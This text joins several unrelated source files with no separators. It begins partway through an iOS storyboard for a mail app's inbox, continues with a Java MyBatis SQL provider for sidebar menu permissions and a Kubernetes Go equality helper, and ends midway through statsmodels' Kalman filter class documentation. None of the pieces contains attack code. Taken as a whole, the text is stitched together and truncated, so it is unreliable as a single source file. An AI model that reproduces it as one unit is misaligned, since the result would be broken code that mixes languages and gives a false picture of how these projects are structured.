<label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" textAlignment="natural" lineBreakMode="tailTruncation" numberOfLines="2" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="55J-2s-TCz">
<rect key="frame" x="0.0" y="42.333333333333329" width="0.0" height="37.999999999999986"/>
<string key="text">Sra. Mendez - Thank you so MUCH for this. We know you do not have to do this and we are so grateful to you. Please let us know if there's anything else we can do.</string>
<fontDescription key="fontDescription" style="UICTFontTextStyleSubhead"/>
<color key="textColor" red="0.40000000000000002" green="0.40000000000000002" blue="0.40000000000000002" alpha="1" colorSpace="calibratedRGB"/>
<nil key="highlightedColor"/>
</label>
</subviews>
<constraints>
<constraint firstItem="PS0-1N-UsZ" firstAttribute="width" secondItem="1HJ-g8-owo" secondAttribute="width" id="SlE-2p-q0h"/>
</constraints>
</stackView>
</subviews>
</view>
<constraints>
<constraint firstItem="1HJ-g8-owo" firstAttribute="top" secondItem="fLQ-Wv-7IX" secondAttribute="topMargin" constant="8" id="2lL-rO-DAu"/>
<constraint firstItem="1HJ-g8-owo" firstAttribute="leading" secondItem="fLQ-Wv-7IX" secondAttribute="leadingMargin" id="DGz-qr-x7U"/>
<constraint firstAttribute="bottomMargin" relation="greaterThanOrEqual" secondItem="1HJ-g8-owo" secondAttribute="bottom" constant="8" id="YoS-XG-3iv"/>
<constraint firstAttribute="trailingMargin" secondItem="1HJ-g8-owo" secondAttribute="trailing" id="j2K-l5-IEc"/>
</constraints>
<connections>
<outlet property="bodyLabel" destination="55J-2s-TCz" id="7h3-f1-1lY"/>
<outlet property="dateLabel" destination="1f9-ii-Bpm" id="s7e-5c-xlo"/>
<outlet property="fromLabel" destination="mP8-DH-PmZ" id="YOz-Wz-MQ9"/>
<outlet property="subjectLabel" destination="Z64-RE-lES" id="MfW-0O-Aae"/>
</connections>
</collectionViewCell>
</cells>
<connections>
<outlet property="dataSource" destination="cmw-A4-aNK" id="7yH-sI-5V9"/>
<outlet property="delegate" destination="cmw-A4-aNK" id="cAX-5G-GfZ"/>
</connections>
</collectionView>
<navigationItem key="navigationItem" title="Inbox" id="cNZ-i7-2vB"/>
</collectionViewController>
<placeholder placeholderIdentifier="IBFirstResponder" id="m70-AD-FEd" userLabel="First Responder" sceneMemberID="firstResponder"/>
</objects>
<point key="canvasLocation" x="1137" y="-370"/>
</scene>
<!--Inbox-->
<scene sceneID="HlW-7Y-kIf">
<objects>
<tableViewController id="6la-Rf-5vT" customClass="MailViewController" customModule="MailExample" customModuleProvider="target" sceneMemberID="viewController">
<tableView key="view" clipsSubviews="YES" contentMode="scaleToFill" alwaysBounceVertical="YES" dataMode="prototypes" style="plain" separatorStyle="default" rowHeight="141" sectionHeaderHeight="28" sectionFooterHeight="28" id="CnD-MW-SLC">
<rect key="frame" x="0.0" y="0.0" width="414" height="736"/>
<autoresizingMask key="autoresizingMask" widthSizable="YES" heightSizable="YES"/>
<color key="backgroundColor" white="1" alpha="1" colorSpace="calibratedWhite"/>
<prototypes>
<tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="default" indentationWidth="10" reuseIdentifier="MailCell" rowHeight="141" id="5Yy-lT-eDE" customClass="MailTableCell" customModule="MailExample" customModuleProvider="target">
<rect key="frame" x="0.0" y="28" width="414" height="141"/>
<autoresizingMask key="autoresizingMask"/>
<tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" tableViewCell="5Yy-lT-eDE" id="4sX-Fn-82y">
<rect key="frame" x="0.0" y="0.0" width="414" height="140.5"/>
<autoresizingMask key="autoresizingMask"/>
<subviews>
<stackView opaque="NO" contentMode="scaleToFill" axis="vertical" alignment="top" spacing="2" translatesAutoresizingMaskIntoConstraints="NO" id="QLZ-ve-Blz">
<rect key="frame" x="15" y="8" width="376" height="80.333333333333329"/>
<subviews>
<stackView opaque="NO" contentMode="scaleToFill" alignment="center" spacing="6" translatesAutoresizingMaskIntoConstraints="NO" id="mEo-oH-eCL">
<rect key="frame" x="0.0" y="0.0" width="376" height="20.333333333333332"/>
<subviews>
<label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="252" verticalHuggingPriority="251" text="John Doe" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="C77-Oi-r7Y">
<rect key="frame" x="0.0" y="0.0" width="75.666666666666671" height="20.333333333333332"/>
<fontDescription key="fontDescription" style="UICTFontTextStyleHeadline"/>
<nil key="textColor"/>
<nil key="highlightedColor"/>
</label>
<label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="12:16 AM" textAlignment="right" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="MgJ-f3-Qel">
<rect key="frame" x="81.666666666666657" y="1.3333333333333339" width="274.33333333333337" height="18"/>
<fontDescription key="fontDescription" style="UICTFontTextStyleSubhead"/>
<color key="textColor" red="0.40000000000000002" green="0.40000000000000002" blue="0.40000000000000002" alpha="1" colorSpace="calibratedRGB"/>
<nil key="highlightedColor"/>
</label>
<imageView userInteractionEnabled="NO" contentMode="scaleToFill" horizontalHuggingPriority="251" verticalHuggingPriority="251" image="Disclosure" translatesAutoresizingMaskIntoConstraints="NO" id="UNG-rq-ulh">
<rect key="frame" x="362" y="3.333333333333333" width="14" height="14"/>
<constraints>
<constraint firstAttribute="width" constant="14" id="Ty6-tZ-2ee"/>
<constraint firstAttribute="height" constant="14" id="eoh-QM-XJN"/>
</constraints>
</imageView>
</subviews>
</stackView>
<label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Fwd: Jane's independent studies" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="kOp-Z7-e55">
<rect key="frame" x="0.0" y="22.333333333333336" width="224.33333333333334" height="18.000000000000007"/>
<fontDescription key="fontDescription" style="UICTFontTextStyleSubhead"/>
<nil key="textColor"/>
<nil key="highlightedColor"/>
</label>
<label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" textAlignment="natural" lineBreakMode="tailTruncation" numberOfLines="2" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="wyD-6Z-4MU">
<rect key="frame" x="0.0" y="42.333333333333329" width="374.66666666666669" height="37.999999999999986"/>
<string key="text">Sra. Mendez - Thank you so MUCH for this. We know you do not have to do this and we are so grateful to you. Please let us know if there's anything else we can do.</string>
<fontDescription key="fontDescription" style="UICTFontTextStyleSubhead"/>
<color key="textColor" red="0.40000000000000002" green="0.40000000000000002" blue="0.40000000000000002" alpha="1" colorSpace="calibratedRGB"/>
<nil key="highlightedColor"/>
</label>
</subviews>
<constraints>
<constraint firstItem="mEo-oH-eCL" firstAttribute="width" secondItem="QLZ-ve-Blz" secondAttribute="width" id="X8m-GN-Ton"/>
</constraints>
</stackView>
</subviews>
<constraints>
<constraint firstItem="QLZ-ve-Blz" firstAttribute="leading" secondItem="4sX-Fn-82y" secondAttribute="leadingMargin" id="1jo-sd-j9z"/>
<constraint firstAttribute="trailingMargin" secondItem="QLZ-ve-Blz" secondAttribute="trailing" constant="8" id="FdO-rr-69c"/>
<constraint firstItem="QLZ-ve-Blz" firstAttribute="top" secondItem="4sX-Fn-82y" secondAttribute="top" constant="8" id="nFw-f6-NF3"/>
<constraint firstAttribute="bottom" relation="greaterThanOrEqual" secondItem="QLZ-ve-Blz" secondAttribute="bottom" constant="8" id="pEp-OB-V1T"/>
</constraints>
</tableViewCellContentView>
<connections>
<outlet property="bodyLabel" destination="wyD-6Z-4MU" id="MSP-7T-ocN"/>
<outlet property="dateLabel" destination="MgJ-f3-Qel" id="bBq-79-w1m"/>
<outlet property="fromLabel" destination="C77-Oi-r7Y" id="EqO-Vs-BwD"/>
<outlet property="subjectLabel" destination="kOp-Z7-e55" id="eAa-z9-y7H"/>
<segue destination="81m-9H-rJk" kind="show" id="jem-dB-OGt">
<segue key="commit" inheritsFrom="parent" id="y2C-s6-bBo"/>
<segue key="preview" inheritsFrom="commit" id="u0F-oO-kTk"/>
</segue>
</connections>
</tableViewCell>
</prototypes>
<connections>
<outlet property="dataSource" destination="6la-Rf-5vT" id="Efw-do-3sC"/>
<outlet property="delegate" destination="6la-Rf-5vT" id="M5W-j9-Dvc"/>
</connections>
</tableView>
<toolbarItems>
<barButtonItem image="MoreOutline" id="uNb-Nn-9h4">
<connections>
<action selector="moreTapped:" destination="6la-Rf-5vT" id="b3a-rO-t14"/>
</connections>
</barButtonItem>
<barButtonItem style="plain" systemItem="flexibleSpace" id="W67-Cg-GPa"/>
<barButtonItem systemItem="compose" id="JKa-4y-qF4"/>
</toolbarItems>
<navigationItem key="navigationItem" title="Inbox" id="OxT-d4-BSj">
<barButtonItem key="rightBarButtonItem" systemItem="edit" id="dHC-AY-Bdd"/>
</navigationItem>
</tableViewController>
<placeholder placeholderIdentifier="IBFirstResponder" id="8lh-aK-vJ4" userLabel="First Responder" sceneMemberID="firstResponder"/>
</objects>
<point key="canvasLocation" x="1137" y="536"/>
</scene>
<!--View Controller-->
<scene sceneID="17V-AF-8zo">
<objects>
<viewController id="81m-9H-rJk" sceneMemberID="viewController">
<layoutGuides>
<viewControllerLayoutGuide type="top" id="Zvn-TP-vhq"/>
<viewControllerLayoutGuide type="bottom" id="7lK-sQ-N5i"/>
</layoutGuides>
<view key="view" contentMode="scaleToFill" id="Wnv-we-QW8">
<rect key="frame" x="0.0" y="0.0" width="414" height="736"/>
<autoresizingMask key="autoresizingMask" widthSizable="YES" heightSizable="YES"/>
<color key="backgroundColor" white="1" alpha="1" colorSpace="calibratedWhite"/>
</view>
<toolbarItems>
<barButtonItem systemItem="organize" id="anf-f8-yx4"/>
<barButtonItem style="plain" systemItem="flexibleSpace" id="utV-fK-yxL"/>
<barButtonItem systemItem="trash" id="mJb-1I-7hu"/>
<barButtonItem style="plain" systemItem="flexibleSpace" id="H5d-uO-1Uq"/>
<barButtonItem systemItem="reply" id="fbW-zE-I1v"/>
<barButtonItem style="plain" systemItem="flexibleSpace" id="7fs-2F-D0z"/>
<barButtonItem systemItem="compose" id="WlO-zb-3kD"/>
</toolbarItems>
<navigationItem key="navigationItem" id="EIm-x7-h3d"/>
</viewController>
<placeholder placeholderIdentifier="IBFirstResponder" id="pAA-dO-BBI" userLabel="First Responder" sceneMemberID="firstResponder"/>
</objects>
<point key="canvasLocation" x="1914" y="166"/>
</scene>
<!--Navigation Controller-->
<scene sceneID="t3H-qW-IeR">
<objects>
<navigationController automaticallyAdjustsScrollViewInsets="NO" toolbarHidden="NO" id="LX8-Wu-PZs" sceneMemberID="viewController">
<toolbarItems/>
<navigationBar key="navigationBar" contentMode="scaleToFill" id="J9z-jV-3U7">
<rect key="frame" x="0.0" y="0.0" width="375" height="44"/>
<autoresizingMask key="autoresizingMask"/>
</navigationBar>
<nil name="viewControllers"/>
<toolbar key="toolbar" opaque="NO" clearsContextBeforeDrawing="NO" contentMode="scaleToFill" id="bOW-0N-oQR">
<rect key="frame" x="0.0" y="692" width="414" height="44"/>
<autoresizingMask key="autoresizingMask"/>
</toolbar>
<connections>
<segue destination="cmw-A4-aNK" kind="relationship" relationship="rootViewController" id="a6O-e5-iEC"/>
</connections>
</navigationController>
<placeholder placeholderIdentifier="IBFirstResponder" id="teA-Er-8PS" userLabel="First Responder" sceneMemberID="firstResponder"/>
</objects>
<point key="canvasLocation" x="204" y="164.16791604197903"/>
</scene>
</scenes>
<resources>
<image name="Disclosure" width="14" height="14"/>
<image name="MoreOutline" width="23" height="23"/>
</resources>
<inferredMetricsTieBreakers>
<segue reference="jem-dB-OGt"/>
</inferredMetricsTieBreakers>
</document>
package com.simon.provider;
import org.apache.ibatis.jdbc.SQL;
import java.util.Map;
/**
 * Sidebar menu permissions.
*
* @author simon
* @date 2019-01-14
**/
public class SideMenuAuthorityProvider {
/**
     * Builds the SQL query statement.
     * @param param query conditions
     * @return the SQL string
*/
public String getList(Map<String, Object> param) {
return new SQL() {
{
SELECT("*");
FROM("t_side_menu_authority");
if (null != param.get("sideMenuId")) {
WHERE("side_menu_id=#{sideMenuId}");
}
}
}.toString();
}
}
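/*
 * Usage sketch: this provider is meant to be referenced from a MyBatis mapper
 * via @SelectProvider. The mapper method and result type below are
 * hypothetical; only the provider class above is real.
 *
 *     @SelectProvider(type = SideMenuAuthorityProvider.class, method = "getList")
 *     List<SideMenuAuthority> getList(Map<String, Object> param);
 */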
/*
Copyright 2015 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package conversion
import (
"k8s.io/apimachinery/third_party/forked/golang/reflect"
)
// The code for this type must be located in third_party, since it forks from
// go std lib. But for convenience, we expose the type here, too.
type Equalities struct {
reflect.Equalities
}
// For convenience, panics on errors
func EqualitiesOrDie(funcs ...interface{}) Equalities {
e := Equalities{reflect.Equalities{}}
if err := e.AddFuncs(funcs...); err != nil {
panic(err)
}
return e
}
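// Usage sketch (the widget type is hypothetical; only Equalities and
// EqualitiesOrDie above are real). AddFuncs accepts functions of the form
// func(T, T) bool, and DeepEqual consults them before falling back to
// reflective comparison:
//
//	type widget struct{ ID string }
//	eq := EqualitiesOrDie(func(a, b widget) bool { return a.ID == b.ID })
//	_ = eq.DeepEqual(widget{ID: "a"}, widget{ID: "a"}) // true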
"""
State Space Representation and Kalman Filter
Author: Chad Fulton
License: Simplified-BSD
"""
import contextlib
from warnings import warn
import numpy as np
from .representation import OptionWrapper, Representation, FrozenRepresentation
from .tools import reorder_missing_matrix, reorder_missing_vector
from . import tools
from statsmodels.tools.sm_exceptions import ValueWarning
# Define constants
FILTER_CONVENTIONAL = 0x01 # Durbin and Koopman (2012), Chapter 4
FILTER_EXACT_INITIAL = 0x02 # ibid., Chapter 5.6
FILTER_AUGMENTED = 0x04 # ibid., Chapter 5.7
FILTER_SQUARE_ROOT = 0x08 # ibid., Chapter 6.3
FILTER_UNIVARIATE = 0x10 # ibid., Chapter 6.4
FILTER_COLLAPSED = 0x20 # ibid., Chapter 6.5
FILTER_EXTENDED = 0x40 # ibid., Chapter 10.2
FILTER_UNSCENTED = 0x80 # ibid., Chapter 10.3
FILTER_CONCENTRATED = 0x100 # Harvey (1989), Chapter 3.4
FILTER_CHANDRASEKHAR = 0x200 # Herbst (2015)
INVERT_UNIVARIATE = 0x01
SOLVE_LU = 0x02
INVERT_LU = 0x04
SOLVE_CHOLESKY = 0x08
INVERT_CHOLESKY = 0x10
STABILITY_FORCE_SYMMETRY = 0x01
MEMORY_STORE_ALL = 0
MEMORY_NO_FORECAST_MEAN = 0x01
MEMORY_NO_FORECAST_COV = 0x02
MEMORY_NO_FORECAST = MEMORY_NO_FORECAST_MEAN | MEMORY_NO_FORECAST_COV
MEMORY_NO_PREDICTED_MEAN = 0x04
MEMORY_NO_PREDICTED_COV = 0x08
MEMORY_NO_PREDICTED = MEMORY_NO_PREDICTED_MEAN | MEMORY_NO_PREDICTED_COV
MEMORY_NO_FILTERED_MEAN = 0x10
MEMORY_NO_FILTERED_COV = 0x20
MEMORY_NO_FILTERED = MEMORY_NO_FILTERED_MEAN | MEMORY_NO_FILTERED_COV
MEMORY_NO_LIKELIHOOD = 0x40
MEMORY_NO_GAIN = 0x80
MEMORY_NO_SMOOTHING = 0x100
MEMORY_NO_STD_FORECAST = 0x200
MEMORY_CONSERVE = (
MEMORY_NO_FORECAST_COV | MEMORY_NO_PREDICTED | MEMORY_NO_FILTERED |
MEMORY_NO_LIKELIHOOD | MEMORY_NO_GAIN | MEMORY_NO_SMOOTHING
)
TIMING_INIT_PREDICTED = 0
TIMING_INIT_FILTERED = 1
class KalmanFilter(Representation):
r"""
State space representation of a time series process, with Kalman filter
Parameters
----------
k_endog : {array_like, int}
The observed time-series process :math:`y` if array like or the
number of variables in the process if an integer.
k_states : int
The dimension of the unobserved state process.
k_posdef : int, optional
The dimension of a guaranteed positive definite covariance matrix
describing the shocks in the transition equation. Must be less than
or equal to `k_states`. Default is `k_states`.
loglikelihood_burn : int, optional
The number of initial periods during which the loglikelihood is not
recorded. Default is 0.
tolerance : float, optional
The tolerance at which the Kalman filter determines convergence to
steady-state. Default is 1e-19.
results_class : class, optional
Default results class to use to save filtering output. Default is
`FilterResults`. If specified, class must extend from `FilterResults`.
**kwargs
Keyword arguments may be used to provide values for the filter,
inversion, and stability methods. See `set_filter_method`,
`set_inversion_method`, and `set_stability_method`.
Keyword arguments may be used to provide default values for state space
matrices. See `Representation` for more details.
See Also
--------
FilterResults
statsmodels.tsa.statespace.representation.Representation
Notes
-----
There are several types of options available for controlling the Kalman
filter operation. All options are internally held as bitmasks, but can be
manipulated by setting class attributes, which act like boolean flags. For
more information, see the `set_*` class method documentation. The options
are:
filter_method
The filtering method controls aspects of which
Kalman filtering approach will be used.
inversion_method
The Kalman filter may contain one matrix inversion: that of the
forecast error covariance matrix. The inversion method controls how and
if that inverse is performed.
stability_method
The Kalman filter is a recursive algorithm that may in some cases
suffer issues with numerical stability. The stability method controls
what, if any, measures are taken to promote stability.
conserve_memory
By default, the Kalman filter computes a number of intermediate
matrices at each iteration. The memory conservation options control
which of those matrices are stored.
filter_timing
By default, the Kalman filter follows Durbin and Koopman, 2012, in
initializing the filter with predicted values. Kim and Nelson, 1999,
instead initialize the filter with filtered values, which is
essentially just a different timing convention.
The `filter_method` and `inversion_method` options intentionally allow
the possibility that multiple methods will be indicated. In the case that
multiple methods are selected, the underlying Kalman filter will attempt to
    select the optimal method given the input data.
For example, it may be that INVERT_UNIVARIATE and SOLVE_CHOLESKY are
indicated (this is in fact the default case). In this case, if the
endogenous vector is 1-dimensional (`k_endog` = 1), then INVERT_UNIVARIATE
is used and inversion reduces to simple division, and if it has a larger
dimension, the Cholesky decomposition along with linear solving (rather
than explicit matrix inversion) is used. If only SOLVE_CHOLESKY had been
set, then the Cholesky decomposition method would *always* be used, even in
the case of 1-dimensional data.
"""
filter_methods = [
'filter_conventional', 'filter_exact_initial', 'filter_augmented',
'filter_square_root', 'filter_univariate', 'filter_collapsed',
'filter_extended', 'filter_unscented', 'filter_concentrated',
'filter_chandrasekhar'
]
filter_conventional = OptionWrapper('filter_method', FILTER_CONVENTIONAL)
"""
(bool) Flag for conventional Kalman filtering.
"""
filter_exact_initial = OptionWrapper('filter_method', FILTER_EXACT_INITIAL)
"""
(bool) Flag for exact initial Kalman filtering. Not implemented.
"""
filter_augmented = OptionWrapper('filter_method', FILTER_AUGMENTED)
"""
(bool) Flag for augmented Kalman filtering. Not implemented.
"""
filter_square_root = OptionWrapper('filter_method', FILTER_SQUARE_ROOT)
"""
(bool) Flag for square-root Kalman filtering. Not implemented.
"""
filter_univariate = OptionWrapper('filter_method', FILTER_UNIVARIATE)
"""
(bool) Flag for univariate filtering of multivariate observation vector.
"""
filter_collapsed = OptionWrapper('filter_method', FILTER_COLLAPSED)
"""
(bool) Flag for Kalman filtering with collapsed observation vector.
"""
filter_extended = OptionWrapper('filter_method', FILTER_EXTENDED)
"""
(bool) Flag for extended Kalman filtering. Not implemented.
"""
filter_unscented = OptionWrapper('filter_method', FILTER_UNSCENTED)
"""
(bool) Flag for unscented Kalman filtering. Not implemented.
"""
filter_concentrated = OptionWrapper('filter_method', FILTER_CONCENTRATED)
"""
(bool) Flag for Kalman filtering with concentrated log-likelihood.
"""
filter_chandrasekhar = OptionWrapper('filter_method', FILTER_CHANDRASEKHAR)
"""
(bool) Flag for filtering with Chandrasekhar recursions.
"""
inversion_methods = [
'invert_univariate', 'solve_lu', 'invert_lu', 'solve_cholesky',
'invert_cholesky'
]
invert_univariate = OptionWrapper('inversion_method', INVERT_UNIVARIATE)
"""
(bool) Flag for univariate inversion method (recommended).
"""
solve_lu = OptionWrapper('inversion_method', SOLVE_LU)
"""
(bool) Flag for LU and linear solver inversion method.
"""
invert_lu = OptionWrapper('inversion_method', INVERT_LU)
"""
(bool) Flag for LU inversion method.
"""
solve_cholesky = OptionWrapper('inversion_method', SOLVE_CHOLESKY)
"""
(bool) Flag for Cholesky and linear solver inversion method (recommended).
"""
invert_cholesky = OptionWrapper('inversion_method', INVERT_CHOLESKY)
"""
(bool) Flag for Cholesky inversion method.
"""
stability_methods = ['stability_force_symmetry']
stability_force_symmetry = (
OptionWrapper('stability_method', STABILITY_FORCE_SYMMETRY)
)
"""
(bool) Flag for enforcing covariance matrix symmetry
"""
memory_options = [
'memory_store_all', 'memory_no_forecast_mean',
'memory_no_forecast_cov', 'memory_no_forecast',
'memory_no_predicted_mean', 'memory_no_predicted_cov',
'memory_no_predicted', 'memory_no_filtered_mean',
'memory_no_filtered_cov', 'memory_no_filtered',
'memory_no_likelihood', 'memory_no_gain',
'memory_no_smoothing', 'memory_no_std_forecast', 'memory_conserve'
]
memory_store_all = OptionWrapper('conserve_memory', MEMORY_STORE_ALL)
"""
(bool) Flag for storing all intermediate results in memory (default).
"""
memory_no_forecast_mean = OptionWrapper(
'conserve_memory', MEMORY_NO_FORECAST_MEAN)
"""
(bool) Flag to prevent storing forecasts and forecast errors.
"""
memory_no_forecast_cov = OptionWrapper(
'conserve_memory', MEMORY_NO_FORECAST_COV)
"""
(bool) Flag to prevent storing forecast error covariance matrices.
"""
@property
def memory_no_forecast(self):
"""
(bool) Flag to prevent storing all forecast-related output.
"""
return self.memory_no_forecast_mean or self.memory_no_forecast_cov
@memory_no_forecast.setter
def memory_no_forecast(self, value):
if bool(value):
self.memory_no_forecast_mean = True
self.memory_no_forecast_cov = True
else:
self.memory_no_forecast_mean = False
self.memory_no_forecast_cov = False
memory_no_predicted_mean = OptionWrapper(
'conserve_memory', MEMORY_NO_PREDICTED_MEAN)
"""
(bool) Flag to prevent storing predicted states.
"""
memory_no_predicted_cov = OptionWrapper(
'conserve_memory', MEMORY_NO_PREDICTED_COV)
"""
(bool) Flag to prevent storing predicted state covariance matrices.
"""
@property
def memory_no_predicted(self):
"""
(bool) Flag to prevent storing predicted state and covariance matrices.
"""
return self.memory_no_predicted_mean or self.memory_no_predicted_cov
@memory_no_predicted.setter
def memory_no_predicted(self, value):
if bool(value):
self.memory_no_predicted_mean = True
self.memory_no_predicted_cov = True
else:
self.memory_no_predicted_mean = False
self.memory_no_predicted_cov = False
memory_no_filtered_mean = OptionWrapper(
'conserve_memory', MEMORY_NO_FILTERED_MEAN)
"""
(bool) Flag to prevent storing filtered states.
"""
memory_no_filtered_cov = OptionWrapper(
'conserve_memory', MEMORY_NO_FILTERED_COV)
"""
(bool) Flag to prevent storing filtered state covariance matrices.
"""
@property
def memory_no_filtered(self):
"""
(bool) Flag to prevent storing filtered state and covariance matrices.
"""
return self.memory_no_filtered_mean or self.memory_no_filtered_cov
@memory_no_filtered.setter
def memory_no_filtered(self, value):
if bool(value):
self.memory_no_filtered_mean = True
self.memory_no_filtered_cov = True
else:
self.memory_no_filtered_mean = False
self.memory_no_filtered_cov = False
memory_no_likelihood = (
OptionWrapper('conserve_memory', MEMORY_NO_LIKELIHOOD)
)
"""
(bool) Flag to prevent storing likelihood values for each observation.
"""
memory_no_gain = OptionWrapper('conserve_memory', MEMORY_NO_GAIN)
"""
(bool) Flag to prevent storing the Kalman gain matrices.
"""
memory_no_smoothing = OptionWrapper('conserve_memory', MEMORY_NO_SMOOTHING)
"""
    (bool) Flag to prevent storing the intermediate values required for smoothing.
"""
memory_no_std_forecast = (
OptionWrapper('conserve_memory', MEMORY_NO_STD_FORECAST))
"""
(bool) Flag to prevent storing standardized forecast errors.
"""
memory_conserve = OptionWrapper('conserve_memory', MEMORY_CONSERVE)
"""
(bool) Flag to conserve the maximum amount of memory.
"""
timing_options = [
'timing_init_predicted', 'timing_init_filtered'
]
timing_init_predicted = OptionWrapper('filter_timing',
TIMING_INIT_PREDICTED)
"""
(bool) Flag for the default timing convention (Durbin and Koopman, 2012).
"""
timing_init_filtered = OptionWrapper('filter_timing', TIMING_INIT_FILTERED)
"""
    (bool) Flag for the alternate timing convention (Kim and Nelson, 1999).
"""
# Default filter options
filter_method = FILTER_CONVENTIONAL
"""
(int) Filtering method bitmask.
"""
inversion_method = INVERT_UNIVARIATE | SOLVE_CHOLESKY
"""
(int) Inversion method bitmask.
"""
stability_method = STABILITY_FORCE_SYMMETRY
"""
(int) Stability method bitmask.
"""
conserve_memory = MEMORY_STORE_ALL
"""
(int) Memory conservation bitmask.
"""
filter_timing = TIMING_INIT_PREDICTED
"""
(int) Filter timing.
"""
def __init__(self, k_endog, k_states, k_posdef=None,
loglikelihood_burn=0, tolerance=1e-19, results_class=None,
kalman_filter_classes=None, **kwargs):
super(KalmanFilter, self).__init__(
k_endog, k_states, k_posdef, **kwargs
)
# Setup the underlying Kalman filter storage
self._kalman_filters = {}
# Filter options
self.loglikelihood_burn = loglikelihood_burn
self.results_class = (
results_class if results_class is not None else FilterResults
)
# Options
self.prefix_kalman_filter_map = (
kalman_filter_classes
if kalman_filter_classes is not None
else tools.prefix_kalman_filter_map.copy())
self.set_filter_method(**kwargs)
self.set_inversion_method(**kwargs)
self.set_stability_method(**kwargs)
self.set_conserve_memory(**kwargs)
self.set_filter_timing(**kwargs)
self.tolerance = tolerance
# Internal flags
# The _scale internal flag is used because we may want to use a fixed
# scale. In that case, the flag passed to the Cython Kalman filter
# should indicate that the scale is not to be concentrated out (i.e.
# self.filter_concentrated = False), but we still want to alert the
# results object that we are viewing the model as one in which the
# scale had been concentrated out, e.g. for degree of freedom
# computations.
# This value should always be None, except within the fixed_scale
# context, and should not be modified by users or anywhere else.
self._scale = None
def _clone_kwargs(self, endog, **kwargs):
# See Representation._clone_kwargs for docstring
kwargs = super(KalmanFilter, self)._clone_kwargs(endog, **kwargs)
# Get defaults for options
kwargs.setdefault('filter_method', self.filter_method)
kwargs.setdefault('inversion_method', self.inversion_method)
kwargs.setdefault('stability_method', self.stability_method)
kwargs.setdefault('conserve_memory', self.conserve_memory)
kwargs.setdefault('filter_timing', self.filter_timing)
kwargs.setdefault('tolerance', self.tolerance)
kwargs.setdefault('loglikelihood_burn', self.loglikelihood_burn)
return kwargs
@property
def _kalman_filter(self):
prefix = self.prefix
if prefix in self._kalman_filters:
return self._kalman_filters[prefix]
return None
def _initialize_filter(self, filter_method=None, inversion_method=None,
stability_method=None, conserve_memory=None,
tolerance=None, filter_timing=None,
loglikelihood_burn=None):
if filter_method is None:
filter_method = self.filter_method
if inversion_method is None:
inversion_method = self.inversion_method
if stability_method is None:
stability_method = self.stability_method
if conserve_memory is None:
conserve_memory = self.conserve_memory
if loglikelihood_burn is None:
loglikelihood_burn = self.loglikelihood_burn
if filter_timing is None:
filter_timing = self.filter_timing
if tolerance is None:
tolerance = self.tolerance
# Make sure we have endog
if self.endog is None:
raise RuntimeError('Must bind a dataset to the model before'
' filtering or smoothing.')
# Initialize the representation matrices
prefix, dtype, create_statespace = self._initialize_representation()
# Determine if we need to (re-)create the filter
# (definitely need to recreate if we recreated the _statespace object)
create_filter = create_statespace or prefix not in self._kalman_filters
if not create_filter:
kalman_filter = self._kalman_filters[prefix]
create_filter = (
kalman_filter.conserve_memory != conserve_memory or
kalman_filter.loglikelihood_burn != loglikelihood_burn
)
# If the dtype-specific _kalman_filter does not exist (or if we need
# to re-create it), create it
if create_filter:
if prefix in self._kalman_filters:
# Delete the old filter
del self._kalman_filters[prefix]
# Setup the filter
cls = self.prefix_kalman_filter_map[prefix]
self._kalman_filters[prefix] = cls(
self._statespaces[prefix], filter_method, inversion_method,
stability_method, conserve_memory, filter_timing, tolerance,
loglikelihood_burn
)
# Otherwise, update the filter parameters
else:
kalman_filter = self._kalman_filters[prefix]
kalman_filter.set_filter_method(filter_method, False)
kalman_filter.inversion_method = inversion_method
kalman_filter.stability_method = stability_method
kalman_filter.filter_timing = filter_timing
kalman_filter.tolerance = tolerance
# conserve_memory and loglikelihood_burn changes always lead to
# re-created filters
return prefix, dtype, create_filter, create_statespace
def set_filter_method(self, filter_method=None, **kwargs):
r"""
Set the filtering method
The filtering method controls aspects of which Kalman filtering
approach will be used.
Parameters
----------
filter_method : int, optional
Bitmask value to set the filter method to. See notes for details.
**kwargs
Keyword arguments may be used to influence the filter method by
setting individual boolean flags. See notes for details.
Notes
-----
The filtering method is defined by a collection of boolean flags, and
is internally stored as a bitmask. The methods available are:
FILTER_CONVENTIONAL
Conventional Kalman filter.
FILTER_UNIVARIATE
Univariate approach to Kalman filtering. Overrides conventional
method if both are specified.
FILTER_COLLAPSED
Collapsed approach to Kalman filtering. Will be used *in addition*
to conventional or univariate filtering.
FILTER_CONCENTRATED
Use the concentrated log-likelihood function. Will be used
*in addition* to the other options.
Note that only the first method is available if using a Scipy version
older than 0.16.
If the bitmask is set directly via the `filter_method` argument, then
the full method must be provided.
If keyword arguments are used to set individual boolean flags, then
the lowercase of the method must be used as an argument name, and the
value is the desired value of the boolean flag (True or False).
Note that the filter method may also be specified by directly modifying
the class attributes which are defined similarly to the keyword
arguments.
The default filtering method is FILTER_CONVENTIONAL.
